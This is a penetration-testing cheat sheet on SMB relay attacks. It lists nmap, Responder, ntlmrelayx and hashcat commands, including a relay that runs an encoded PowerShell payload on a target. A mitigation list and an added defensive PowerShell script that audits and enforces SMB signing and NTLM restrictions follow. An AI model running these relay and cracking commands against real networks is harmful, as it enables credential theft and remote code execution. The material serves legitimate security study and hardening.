SMB Relay
Overview
Instead of cracking the captured hashes, we can relay them to specific machines and potentially gain access.
However, SMB signing MUST BE DISABLED or NOT ENFORCED on the target, and the relayed credentials must be a local administrator on that machine for the relay to have any real value.
Identify Hosts Without SMB Signing
nmap --script=smb2-security-mode.nse -p445 192.168.1.0/24
Desired Output
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Edit Responder Configuration File
sudo vim /etc/responder/Responder.conf
SMB = off
HTTP = off
Responder + SMB Relay
sudo responder -I eth0 -dwv
impacket-ntlmrelayx -tf targets.txt -smb2support
Existing Shell + SMB Relay
ntlmrelayx.py --no-http-server -smb2support -t 192.168.186.212 -c "powershell -e JABPE..."
net use "\\192.168.45.237\share"
Crack SAM Hashes
hashcat -m 1000 crackme.txt ~/rockyou.txt -O
Mitigation
Enable SMB signing on all devices
Pro: Completely stops the attack
Con: Performance issues may arise with file copies
Disable NTLM authentication on the network
Pro: Completely stops the attack
Con: If Kerberos stops working, Windows falls back to NTLM
Limit Domain Admin accounts to the specific tasks that need them
Restrict local administrator accounts
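As an added example for the mitigation list above (this is not part of the original page), the following PowerShell script audits a Windows host for the settings that decide whether it can be relayed to: whether SMB signing is merely enabled (the "enabled but not required" nmap result) or actually required, on both the server and client side, and whether the "Network security: Restrict NTLM" policy values are set. With -Enforce it switches signing to required. The cmdlets are the standard SmbShare module ones (Windows 8 / Server 2012 and later); the registry value names under MSV1_0 are the documented policy values, but confirm the meaning of each numeric setting against the policy documentation before enforcing NTLM restrictions.

```powershell
# Added example, not from the original page: audit (and optionally enforce) the SMB relay
# mitigations on a Windows host. Run from an elevated PowerShell session.
# Assumes the SmbShare module and the standard registry path for the Restrict NTLM policy.
param(
    [switch]$Enforce   # without -Enforce the script only reports
)

function Get-SmbSigningStatus {
    # RequireSecuritySignature is the setting that defeats relay. EnableSecuritySignature
    # alone only advertises support, which nmap reports as "enabled but not required".
    $server = Get-SmbServerConfiguration
    $client = Get-SmbClientConfiguration
    [pscustomobject]@{
        ServerSigningEnabled  = $server.EnableSecuritySignature
        ServerSigningRequired = $server.RequireSecuritySignature
        ClientSigningEnabled  = $client.EnableSecuritySignature
        ClientSigningRequired = $client.RequireSecuritySignature
    }
}

function Get-NtlmRestriction {
    # Values of the "Network security: Restrict NTLM" policies. A missing value means the
    # policy is not configured (NTLM allowed); 0 means explicitly "allow all". Any other
    # value means some auditing or restriction is in place (see the policy documentation).
    $lsa   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'
    $props = Get-ItemProperty -Path $lsa -ErrorAction SilentlyContinue
    [pscustomobject]@{
        RestrictSendingNTLMTraffic   = $props.RestrictSendingNTLMTraffic
        RestrictReceivingNTLMTraffic = $props.RestrictReceivingNTLMTraffic
        AuditReceivingNTLMTraffic    = $props.AuditReceivingNTLMTraffic
    }
}

function Set-SmbSigningRequired {
    # Enforce signing for both roles. -Force suppresses the confirmation prompt.
    Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
    Set-SmbClientConfiguration -RequireSecuritySignature $true -Force
}

$signing = Get-SmbSigningStatus
$ntlm    = Get-NtlmRestriction

Write-Output 'SMB signing configuration:'
$signing | Format-List | Out-String | Write-Output
Write-Output 'Restrict NTLM policy values (blank = not configured):'
$ntlm | Format-List | Out-String | Write-Output

# Verdicts a defender cares about
if (-not $signing.ServerSigningRequired) {
    Write-Warning 'Server-side SMB signing is not required: this host is a viable SMB relay target.'
}
if (-not $signing.ClientSigningRequired) {
    Write-Warning 'Client-side SMB signing is not required: this host will talk to servers that do not sign.'
}
if (-not $ntlm.RestrictReceivingNTLMTraffic -and -not $ntlm.AuditReceivingNTLMTraffic) {
    Write-Warning 'Incoming NTLM is neither restricted nor audited; consider enabling auditing first to find NTLM dependencies before denying it.'
}

if ($Enforce) {
    Set-SmbSigningRequired
    Write-Output 'SMB signing is now required for server and client. Re-run without -Enforce to verify.'
}
```

Run it as .\Audit-SmbRelay.ps1 to report only, and with -Enforce to require signing. Roll the NTLM restriction out separately through Group Policy after the audit log shows which hosts or applications still depend on NTLM, since the page's own caveat applies: if Kerberos fails, clients fall back to NTLM, and a blanket deny will break them.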